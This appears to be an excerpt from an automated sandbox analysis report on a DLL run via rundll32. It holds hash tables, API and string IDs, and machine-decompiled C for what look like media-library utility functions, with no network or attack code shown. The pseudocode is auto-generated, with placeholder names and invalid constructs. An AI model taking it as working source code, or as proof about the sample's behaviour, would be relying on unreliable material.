                                                                      • Instruction ID: 3ce9d50094e6346554c2820e15aae8c95f0dca09f8e32c6084807ed2f7b375be
                                                                      • Opcode Fuzzy Hash: acf8950ea6c148c44c64157bc22eca501f0550abc9d144bf7c67352d16790dd9
                                                                      • Instruction Fuzzy Hash: 26019DB59093448FC709CF18E48842AFBE0FB8C355F11892EF8CCA7740E774AA448B46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *
                                                                      • API String ID: 0-163128923
                                                                      • Opcode ID: ebd0914c98d536ce5320c55f93b04da2ed1618b2e22c755dc20f5b7cb9212f43
                                                                      • Instruction ID: cf0b5ffff515d544aa88b6753479d2fbc1523f17d7230f1051f2f56c5c5a0ce0
                                                                      • Opcode Fuzzy Hash: ebd0914c98d536ce5320c55f93b04da2ed1618b2e22c755dc20f5b7cb9212f43
                                                                      • Instruction Fuzzy Hash: EB414DB6E083514FD340CE29C88021AF7E1EBC8754F5A892EF8D8DB351E674ED418B82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d6db034cff99af1e7203ee44394934ffb7567196ced3806a0dc990b907df53bb
                                                                      • Instruction ID: 3bfc1c5f2a162aac7bd0c21019aebd2925a812e4926be9baa0010d95d64e9f74
                                                                      • Opcode Fuzzy Hash: d6db034cff99af1e7203ee44394934ffb7567196ced3806a0dc990b907df53bb
                                                                      • Instruction Fuzzy Hash: 9532503274471D4BC708EEE9DC811D5B3D2BB88614F49813C9E15D3706FBB8BA6A96C8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7fd6380a6ea4c78d65a7d71ee52a6b8ffee4365087ee231698d748b4880fdc6b
                                                                      • Instruction ID: f869e9a1b34da82721341a2e34109cf1638c9a300c83071e32ba022aecfd3d09
                                                                      • Opcode Fuzzy Hash: 7fd6380a6ea4c78d65a7d71ee52a6b8ffee4365087ee231698d748b4880fdc6b
                                                                      • Instruction Fuzzy Hash: DB228672A083559FC715DE28C8C155AB7F1FF89316F198A2DE9C9AB310D234EE05DB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 33419a9aeb14ce56b4ab0fd1bc83750a17983b722cf78c8c468c2c97687aa838
                                                                      • Instruction ID: 3194deff8c1016480bd4981d57c44dc359412b19884f203e35b39e086724ce96
                                                                      • Opcode Fuzzy Hash: 33419a9aeb14ce56b4ab0fd1bc83750a17983b722cf78c8c468c2c97687aa838
                                                                      • Instruction Fuzzy Hash: D342DE756087409FC754CF29C58099AFBE2BFCE250F16C92EE899C7356D630E942CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e12ceeeddabea2a45ca0b25d6d0e56ab0a323e72b2d12a6fe70e262d570a28b0
                                                                      • Instruction ID: 9772ef97af37772237b7d3f4791e376c52d85cc118ce0e008e01ab5786da6001
                                                                      • Opcode Fuzzy Hash: e12ceeeddabea2a45ca0b25d6d0e56ab0a323e72b2d12a6fe70e262d570a28b0
                                                                      • Instruction Fuzzy Hash: 0002F1719083058FC314CF28D88025ABBF2EFCA344F59896ED8989F356D775D986CB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 649db449800bb8f44d4b591db05436e0eed4080366275189c04215ec29e8d69e
                                                                      • Instruction ID: a1783afd4e89d5d45f318d4dea30fc4f4dbee87a7b07b29a2b4422f07ac09f3a
                                                                      • Opcode Fuzzy Hash: 649db449800bb8f44d4b591db05436e0eed4080366275189c04215ec29e8d69e
                                                                      • Instruction Fuzzy Hash: 55E10675B083008FC314CE2CD88060AFBE6BBC9764F598A2DF999D73A1D775E9458B42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      • Invalid chars '%s' at the end of expression '%s', xrefs: 1001726C
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_mallocz
                                                                      • String ID: Invalid chars '%s' at the end of expression '%s'
                                                                      • API String ID: 1901900789-1422635149
                                                                      • Opcode ID: d35623eb4b68d314ae0af4ba429531c6b924d290049fd1e943cfdb02dea8e5ab
                                                                      • Instruction ID: c3773f839444201a897c0eab6702ce5d2794ca60865343955b286594f26e5f05
                                                                      • Opcode Fuzzy Hash: d35623eb4b68d314ae0af4ba429531c6b924d290049fd1e943cfdb02dea8e5ab
                                                                      • Instruction Fuzzy Hash: E1E182B89097459FC780DFA8D08191ABBF1FF88290F95586DF8C58B312D735E881CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 91%
                                                                      			E10017261(void* __eax, void* __ebx, void* __edi, intOrPtr __esi, char _a4, char* _a8, char* _a12, intOrPtr _a16, char _a48, char* _a52, char _a56, char _a60) {
                                                                      				intOrPtr _t116;
                                                                      				void* _t118;
                                                                      				intOrPtr* _t120;
                                                                      
                                                                      				_t116 = __esi;
                                                                      				_a12 = __eax;
                                                                      				__eax = "Invalid chars \'%s\' at the end of expression \'%s\'\n";
                                                                      				__edx = 0x10;
                                                                      				_a8 = "Invalid chars \'%s\' at the end of expression \'%s\'\n";
                                                                      				__eax =  &_a60;
                                                                      				_a16 = __ebx;
                                                                      				_a4 = 0x10;
                                                                      				 *__esp =  &_a60;
                                                                      				__eax = E10026560();
                                                                      				_a48 = __edi;
                                                                      				if(__edi != 0) {
                                                                      					__eax =  *(__edi + 0x18);
                                                                      					_a52 = __eax;
                                                                      					if(__eax != 0) {
                                                                      						__edx = __eax[0x18];
                                                                      						_a56 = __edx;
                                                                      						if(__edx != 0) {
                                                                      							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
                                                                      							_a56 =  *(_a56 + 0x1c);
                                                                      							__eax = E10015280( *(_a56 + 0x1c));
                                                                      							_a56 =  *(_a56 + 0x20);
                                                                      							E10015280( *(_a56 + 0x20)) = _a56;
                                                                      							__eax = _a56 + 0x24;
                                                                      							E100290E0(_a56 + 0x24);
                                                                      							__eax =  &_a56;
                                                                      							E100290E0( &_a56);
                                                                      							__eax = _a52;
                                                                      						}
                                                                      						__edx = __eax[0x1c];
                                                                      						_a56 = __edx;
                                                                      						if(__edx != 0) {
                                                                      							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
                                                                      							_a56 =  *(_a56 + 0x1c);
                                                                      							__eax = E10015280( *(_a56 + 0x1c));
                                                                      							_a56 =  *(_a56 + 0x20);
                                                                      							E10015280( *(_a56 + 0x20)) = _a56;
                                                                      							__eax = _a56 + 0x24;
                                                                      							E100290E0(_a56 + 0x24);
                                                                      							__eax =  &_a56;
                                                                      							E100290E0( &_a56);
                                                                      							__eax = _a52;
                                                                      						}
                                                                      						__edx = __eax[0x20];
                                                                      						_a56 = __edx;
                                                                      						if(__edx != 0) {
                                                                      							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
                                                                      							_a56 =  *(_a56 + 0x1c);
                                                                      							__eax = E10015280( *(_a56 + 0x1c));
                                                                      							_a56 =  *(_a56 + 0x20);
                                                                      							E10015280( *(_a56 + 0x20)) = _a56;
                                                                      							__eax = _a56 + 0x24;
                                                                      							E100290E0(_a56 + 0x24);
                                                                      							__eax =  &_a56;
                                                                      							E100290E0( &_a56);
                                                                      							__eax = _a52;
                                                                      						}
                                                                      						E100290E0(__eax);
                                                                      						__eax =  &_a52;
                                                                      						E100290E0( &_a52);
                                                                      						__edi = _a48;
                                                                      					}
                                                                      					__eax =  *(__edi + 0x1c);
                                                                      					_a52 = __eax;
                                                                      					if(__eax == 0) {
                                                                      						L22:
                                                                      						__eax =  *(__edi + 0x20);
                                                                      						_a52 = __eax;
                                                                      						if(__eax == 0) {
                                                                      							L30:
                                                                      							E100290E0(__edi);
                                                                      							__eax =  &_a48;
                                                                      							E100290E0( &_a48);
                                                                      							goto L1;
                                                                      						}
                                                                      						__edx = __eax[0x18];
                                                                      						_a56 = __edx;
                                                                      						if(__edx != 0) {
                                                                      							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
                                                                      							_a56 =  *(_a56 + 0x1c);
                                                                      							__eax = E10015280( *(_a56 + 0x1c));
                                                                      							_a56 =  *(_a56 + 0x20);
                                                                      							E10015280( *(_a56 + 0x20)) = _a56;
                                                                      							__eax = _a56 + 0x24;
                                                                      							E100290E0(_a56 + 0x24);
                                                                      							__eax =  &_a56;
                                                                      							E100290E0( &_a56);
                                                                      							__eax = _a52;
                                                                      						}
                                                                      						__edx = __eax[0x1c];
                                                                      						_a56 = __edx;
                                                                      						if(__edx != 0) {
                                                                      							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
                                                                      							_a56 =  *(_a56 + 0x1c);
                                                                      							__eax = E10015280( *(_a56 + 0x1c));
                                                                      							_a56 =  *(_a56 + 0x20);
                                                                      							E10015280( *(_a56 + 0x20)) = _a56;
                                                                      							__eax = _a56 + 0x24;
                                                                      							E100290E0(_a56 + 0x24);
                                                                      							__eax =  &_a56;
                                                                      							E100290E0( &_a56);
                                                                      							__eax = _a52;
                                                                      						}
                                                                      						__edx = __eax[0x20];
                                                                      						_a56 = __edx;
                                                                      						if(__edx != 0) {
                                                                      							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
                                                                      							_a56 =  *(_a56 + 0x1c);
                                                                      							__eax = E10015280( *(_a56 + 0x1c));
                                                                      							_a56 =  *(_a56 + 0x20);
                                                                      							E10015280( *(_a56 + 0x20)) = _a56;
                                                                      							__eax = _a56 + 0x24;
                                                                      							E100290E0(_a56 + 0x24);
                                                                      							__eax =  &_a56;
                                                                      							E100290E0( &_a56);
                                                                      							__eax = _a52;
                                                                      						}
                                                                      						E100290E0(__eax);
                                                                      						__eax =  &_a52;
                                                                      						E100290E0( &_a52);
                                                                      						__edi = _a48;
                                                                      						goto L30;
                                                                      					} else {
                                                                      						__edx = __eax[0x18];
                                                                      						_a56 = __edx;
                                                                      						if(__edx != 0) {
                                                                      							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
                                                                      							_a56 =  *(_a56 + 0x1c);
                                                                      							__eax = E10015280( *(_a56 + 0x1c));
                                                                      							_a56 =  *(_a56 + 0x20);
                                                                      							E10015280( *(_a56 + 0x20)) = _a56;
                                                                      							__eax = _a56 + 0x24;
                                                                      							E100290E0(_a56 + 0x24);
                                                                      							__eax =  &_a56;
                                                                      							E100290E0( &_a56);
                                                                      							__eax = _a52;
                                                                      						}
                                                                      						__edx = __eax[0x1c];
                                                                      						_a56 = __edx;
                                                                      						if(__edx != 0) {
                                                                      							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
                                                                      							_a56 =  *(_a56 + 0x1c);
                                                                      							__eax = E10015280( *(_a56 + 0x1c));
                                                                      							_a56 =  *(_a56 + 0x20);
                                                                      							E10015280( *(_a56 + 0x20)) = _a56;
                                                                      							__eax = _a56 + 0x24;
                                                                      							E100290E0(_a56 + 0x24);
                                                                      							__eax =  &_a56;
                                                                      							E100290E0( &_a56);
                                                                      							__eax = _a52;
                                                                      						}
                                                                      						__edx = __eax[0x20];
                                                                      						_a56 = __edx;
                                                                      						if(__edx != 0) {
                                                                      							 *((intOrPtr*)(__edx + 0x18)) = E10015280( *((intOrPtr*)(__edx + 0x18)));
                                                                      							_a56 =  *(_a56 + 0x1c);
                                                                      							__eax = E10015280( *(_a56 + 0x1c));
                                                                      							_a56 =  *(_a56 + 0x20);
                                                                      							E10015280( *(_a56 + 0x20)) = _a56;
                                                                      							__eax = _a56 + 0x24;
                                                                      							E100290E0(_a56 + 0x24);
                                                                      							__eax =  &_a56;
                                                                      							E100290E0( &_a56);
                                                                      							__eax = _a52;
                                                                      						}
                                                                      						E100290E0(__eax);
                                                                      						__eax =  &_a52;
                                                                      						E100290E0( &_a52);
                                                                      						__edi = _a48;
                                                                      						goto L22;
                                                                      					}
                                                                      				}
                                                                      				L1:
                                                                      				 *_t120 = _t116;
                                                                      				L100290D0();
                                                                      				return _t118;
                                                                      			}







                                                                      APIs
                                                                      Strings
                                                                      • Invalid chars '%s' at the end of expression '%s', xrefs: 1001726C
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_freep$mv_expr_free$mv_log
                                                                      • String ID: Invalid chars '%s' at the end of expression '%s'
                                                                      • API String ID: 75827668-1422635149
                                                                      • Opcode ID: 62983a3bb7049393546072b60dbe7a8ba563001771bc1cc3aa272a22c57f5d9a
                                                                      • Instruction ID: 39916f313f6673765a40fa09fad6d79edb9ef4feb13054b409069c6d602bd34a
                                                                      • Opcode Fuzzy Hash: 62983a3bb7049393546072b60dbe7a8ba563001771bc1cc3aa272a22c57f5d9a
                                                                      • Instruction Fuzzy Hash: F3C133B95097459FC784EFA8D18591ABBF0FF88290F85586DF8C58B311D635E880CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_log$mv_freep
                                                                      • String ID: %-15s $ %s$ (default $ (from $ to $"%s"$%-12lld $%-12s $%c%c%c%c%c%c%c%c%c%c%c$%d/%d$%lld
                                                                      • API String ID: 3216983768-538076109
                                                                      • Opcode ID: ac0072550d9328f0ee7ca60dd531dc481fba00c2972fbd96b99def6fa88064fd
                                                                      • Instruction ID: fb6ea6c6a0f2321fbc4e3f9226b07db0358892c939e969a2d4937e0b03469604
                                                                      • Opcode Fuzzy Hash: ac0072550d9328f0ee7ca60dd531dc481fba00c2972fbd96b99def6fa88064fd
                                                                      • Instruction Fuzzy Hash: 3D0204B4A08B458FC714CF68D48065EBBE1FF88750F95C92EF8A98B355E734E8448B42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_log
                                                                      • String ID: -DBL_MAX$-DBL_MIN$-FLT_MAX$-FLT_MIN$DBL_MAX$DBL_MIN$FLT_MAX$FLT_MIN$I64_MAX$I64_MIN$INT_MAX$INT_MIN$UINT32_MAX
                                                                      • API String ID: 2418673259-2628725902
                                                                      • Opcode ID: 4b69fef14bdbb6910b69d575034c011d7efd4a86ec80ae8f31d44e7f23f84011
                                                                      • Instruction ID: d7664abcd9faac0ce6b62ddf477cf7159e8170a1b3dfe873e1d3bd3be2708879
                                                                      • Opcode Fuzzy Hash: 4b69fef14bdbb6910b69d575034c011d7efd4a86ec80ae8f31d44e7f23f84011
                                                                      • Instruction Fuzzy Hash: 62512EB9908F548FC354EF25E49531EBAE1FF84380FD4C92D94C99B325E73989859B02
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: _errnomv_callocmv_freep$ByteCharMultiWidewcscatwcscpywcslen$_sopen_wsopen
                                                                      • String ID: \\?\$\\?\UNC\
                                                                      • API String ID: 2585690843-3019864461
                                                                      • Opcode ID: 378f72ee278ce5d6c1fa6c04bbe2b06fef19544e86df13747ce3d1d992c4811e
                                                                      • Instruction ID: 3dc82464431d1485f9b1200b51e46201d74a27639f097cc6c66f11d6c06c393f
                                                                      • Opcode Fuzzy Hash: 378f72ee278ce5d6c1fa6c04bbe2b06fef19544e86df13747ce3d1d992c4811e
                                                                      • Instruction Fuzzy Hash: 9391D3B49093059FC350EF69848421EBBE0FF89794F51892EF8D8CB290E774D980DB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 17%
                                                                      			E10011560(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr __ebp, signed int* _a4, signed int* _a8, signed int _a12, intOrPtr _a16, signed int _a20) {
                                                                      				intOrPtr _v4;
                                                                      				intOrPtr _v8;
                                                                      				intOrPtr _v12;
                                                                      				intOrPtr _v16;
                                                                      				char _v50;
                                                                      				void* _v56;
                                                                      				void* _v60;
                                                                      				void* _v64;
                                                                      				intOrPtr _v92;
                                                                      				signed int _v96;
                                                                      				signed int* _v100;
                                                                      				signed int* _v104;
                                                                      				signed int* _t89;
                                                                      				signed int* _t98;
                                                                      				signed int* _t99;
                                                                      				signed int _t104;
                                                                      				void* _t105;
                                                                      				int _t109;
                                                                      				int _t110;
                                                                      				void* _t112;
                                                                      				signed int _t116;
                                                                      				signed int* _t121;
                                                                      				signed int _t127;
                                                                      				int _t129;
                                                                      				signed int _t130;
                                                                      				intOrPtr* _t133;
                                                                      				signed int* _t134;
                                                                      				void* _t136;
                                                                      				signed int* _t140;
                                                                      				signed int* _t142;
                                                                      				int _t143;
                                                                      				void* _t144;
                                                                      				signed int* _t149;
                                                                      				void* _t150;
                                                                      				signed int* _t152;
                                                                      				signed int _t153;
                                                                      				int _t155;
                                                                      				signed int _t156;
                                                                      				void _t158;
                                                                      				signed int** _t162;
                                                                      				signed int** _t163;
                                                                      
                                                                      				_v16 = __ebx;
                                                                      				_v12 = __esi;
                                                                      				_v104 = 0x16;
                                                                      				_t149 =  &_v50;
                                                                      				 *_t163 = _t149;
                                                                      				_v92 = _a16;
                                                                      				_v96 = _a12;
                                                                      				_v100 = 0x100b4200;
                                                                      				_v8 = __edi;
                                                                      				_t140 = _a8;
                                                                      				_v4 = __ebp;
                                                                      				E10011040();
                                                                      				_v60 = 0;
                                                                      				_t121 =  *_a4;
                                                                      				 *_t163 = _t149;
                                                                      				_v56 = 0;
                                                                      				_t89 = E100292E0(_t121, _t140, _t149, 0);
                                                                      				_v56 = _t89;
                                                                      				if(_t140 == 0) {
                                                                      					_t150 = 0xffffffea;
                                                                      					L24:
                                                                      					if(_t121 == 0) {
                                                                      						L16:
                                                                      						 *_t163 = _v60;
                                                                      						L100290D0();
                                                                      						 *_t163 = _v56;
                                                                      						L100290D0();
                                                                      						L17:
                                                                      						return _t150;
                                                                      					}
                                                                      					L15:
                                                                      					if( *_t121 == 0) {
                                                                      						 *_t163 =  &(_t121[1]);
                                                                      						E100290E0();
                                                                      						 *_t163 = _a4;
                                                                      						E100290E0();
                                                                      					}
                                                                      					goto L16;
                                                                      				}
                                                                      				_t162 = 0;
                                                                      				_t152 = _t89;
                                                                      				if((_a20 & 0x00000040) == 0) {
                                                                      					_v104 = _t140;
                                                                      					_v100 = 0;
                                                                      					 *_t163 = _t121;
                                                                      					_v96 = _a20 & 0xfffffff7;
                                                                      					_t162 = E100110D0();
                                                                      				}
                                                                      				if((_a20 & 0x00000004) == 0) {
                                                                      					 *_t163 = _t140;
                                                                      					_t98 = E100292E0(_t121, _t140, _t152, _t162);
                                                                      					_v60 = _t98;
                                                                      					_t142 = _t98;
                                                                      					if(_t121 == 0) {
                                                                      						L19:
                                                                      						 *_t163 = 8;
                                                                      						_t99 = E10029100();
                                                                      						_t142 = _v60;
                                                                      						_t121 = _t99;
                                                                      						 *_a4 = _t121;
                                                                      						if(_t121 == 0 || _t142 == 0) {
                                                                      							_t150 = 0xfffffff4;
                                                                      							goto L24;
                                                                      						} else {
                                                                      							L21:
                                                                      							_t152 = _v56;
                                                                      							L4:
                                                                      							if(_t152 == 0) {
                                                                      								L14:
                                                                      								_t150 = 0xfffffff4;
                                                                      								goto L15;
                                                                      							}
                                                                      							if(_t162 == 0) {
                                                                      								_v100 = 8;
                                                                      								_v104 =  *_t121 + 1;
                                                                      								 *_t163 = _t121[1];
                                                                      								_t104 = E10029010();
                                                                      								_t153 = _t104;
                                                                      								if(_t104 == 0) {
                                                                      									goto L14;
                                                                      								}
                                                                      								_t121[1] = _t104;
                                                                      								_t127 =  *_t121;
                                                                      								L10:
                                                                      								_t105 = _v56;
                                                                      								if(_t105 == 0) {
                                                                      									if(_t127 == 0) {
                                                                      										 *_t163 =  &(_t121[1]);
                                                                      										E100290E0();
                                                                      										 *_t163 = _a4;
                                                                      										E100290E0();
                                                                      									}
                                                                      									_t150 = 0;
                                                                      									 *_t163 =  &_v60;
                                                                      									E100290E0();
                                                                      								} else {
                                                                      									_t133 = _t153 + _t127 * 8;
                                                                      									 *((intOrPtr*)(_t133 + 4)) = _t105;
                                                                      									 *_t133 = _v60;
                                                                      									_t150 = 0;
                                                                      									 *_t121 = _t127 + 1;
                                                                      								}
                                                                      								goto L17;
                                                                      							}
                                                                      							if((_a20 & 0x00000010) != 0) {
                                                                      								 *_t163 = _t142;
                                                                      								_t150 = 0;
                                                                      								L100290D0();
                                                                      								 *_t163 = _v56;
                                                                      								L100290D0();
                                                                      								goto L17;
                                                                      							}
                                                                      							_t134 = _a4;
                                                                      							 *_t163 = _t134;
                                                                      							if((_a20 & 0x00000020) != 0) {
                                                                      								_v64 = _t134;
                                                                      								_t109 = strlen(??);
                                                                      								 *_t163 = _t152;
                                                                      								_t143 = _t109;
                                                                      								_t110 = strlen(??);
                                                                      								 *_t163 = _v64;
                                                                      								_t155 = _t110;
                                                                      								_t68 = _t110 + 1; // 0x1
                                                                      								_v104 = _t143 + _t68;
                                                                      								_t112 = L10028DA0();
                                                                      								if(_t112 == 0) {
                                                                      									goto L14;
                                                                      								}
                                                                      								_t70 = _t155 + 1; // 0x1
                                                                      								_t129 = _t70;
                                                                      								_t144 = _t143 + _t112;
                                                                      								_t136 = _v56;
                                                                      								if(_t129 >= 8) {
                                                                      									if((_t144 & 0x00000001) != 0) {
                                                                      										_t130 =  *_t136 & 0x000000ff;
                                                                      										_t144 = _t144 + 1;
                                                                      										_t136 = _t136 + 1;
                                                                      										 *(_t144 - 1) = _t130;
                                                                      										_t129 = _t155;
                                                                      									}
                                                                      									if((_t144 & 0x00000002) != 0) {
                                                                      										_t156 =  *_t136 & 0x0000ffff;
                                                                      										_t144 = _t144 + 2;
                                                                      										_t136 = _t136 + 2;
                                                                      										_t129 = _t129 - 2;
                                                                      										 *(_t144 - 2) = _t156;
                                                                      									}
                                                                      									if((_t144 & 0x00000004) != 0) {
                                                                      										_t158 =  *_t136;
                                                                      										_t144 = _t144 + 4;
                                                                      										_t136 = _t136 + 4;
                                                                      										_t129 = _t129 - 4;
                                                                      										 *(_t144 - 4) = _t158;
                                                                      									}
                                                                      								}
                                                                      								_v64 = _t112;
                                                                      								memcpy(_t144, _t136, _t129);
                                                                      								_t163 =  &(_t163[3]);
                                                                      								 *_t163 =  &_v56;
                                                                      								E100290E0();
                                                                      								_v56 = _v64;
                                                                      								goto L9;
                                                                      							} else {
                                                                      								L100290D0();
                                                                      								L9:
                                                                      								 *_t163 =  *_t162;
                                                                      								L100290D0();
                                                                      								_t116 =  *_t121;
                                                                      								_t153 = _t121[1];
                                                                      								_t32 = _t116 - 1; // -1
                                                                      								_t127 = _t32;
                                                                      								 *_t121 = _t127;
                                                                      								 *_t162 =  *(_t153 + _t127 * 8);
                                                                      								_a4 =  *(_t153 + 4 + _t127 * 8);
                                                                      								goto L10;
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					if(_t98 != 0) {
                                                                      						goto L21;
                                                                      					}
                                                                      					goto L14;
                                                                      				}
                                                                      				_v60 = _t140;
                                                                      				if(_t121 == 0) {
                                                                      					goto L19;
                                                                      				}
                                                                      				goto L4;
                                                                      			}

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: strlen$mv_freepmv_strdup$_aligned_reallocmv_dict_getmv_malloczmv_reallocmv_realloc_array
                                                                      • String ID: $%lld
                                                                      • API String ID: 420417855-3617178099
